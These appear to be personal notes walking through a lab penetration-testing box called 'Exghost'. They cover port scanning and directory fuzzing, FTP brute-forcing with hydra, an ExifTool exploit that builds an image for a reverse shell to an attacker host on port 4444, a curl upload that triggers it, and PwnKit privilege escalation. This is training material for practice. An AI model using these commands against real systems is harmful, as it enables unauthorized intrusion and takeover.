Exghost (easy)

[WDavid404]

keypoints:

• FTP brute-force
  hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183
• [PE] PwnKit Vulnerability (CVE-2021–4034) --pythone version for exploit

Learned:

• FFUF may get more info than feroxbuster

[WDavid404]

PORT   STATE  SERVICE  REASON         VERSION
21/tcp open   ftp      syn-ack ttl 61 vsftpd 3.0.3
80/tcp open   http     syn-ack ttl 61 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: 403 Forbidden

FTP via anonymouse --> faile

search vsftpd 3.0.3 exploit --> https://www.exploit-db.com/exploits/49719 (Remote Denial of Service)
search apache 2.4.41 exploit --> no useful info

feroxbuster -u http://192.168.243.183/ -k -C 404,503,502
--> /uploads (301)

ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.183/FUZZ
--> get more info:
/uploads
/exiftool
/server-status

Access /exiftool --> get version info: '12.23'
--->
https://www.exploit-db.com/exploits/50911
--> however, didn't find a way to use it

Try brute-forse FTP:
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183

ftp login
ls command --> "229 Entering Extended Passive Mode"
resolve: input "passive" command
“get backup" to download backup file
-->

Prepare an image
python3 50911.py -s 192.168.45.192 4444
--> generate a jpg image file.

curl -POST -F myFile=@/home/kali/pen-200/PGBox/image.jpg 192.168.243.183/exiftest.php -H 'Content-Type: multipart/form-data' -vv
--> get reverse shell

linpeas.sh
-->CVE-2021–4034

--->
There is python instead of compiling c++:
https://github.com/joeammond/CVE-2021-4034.git
-->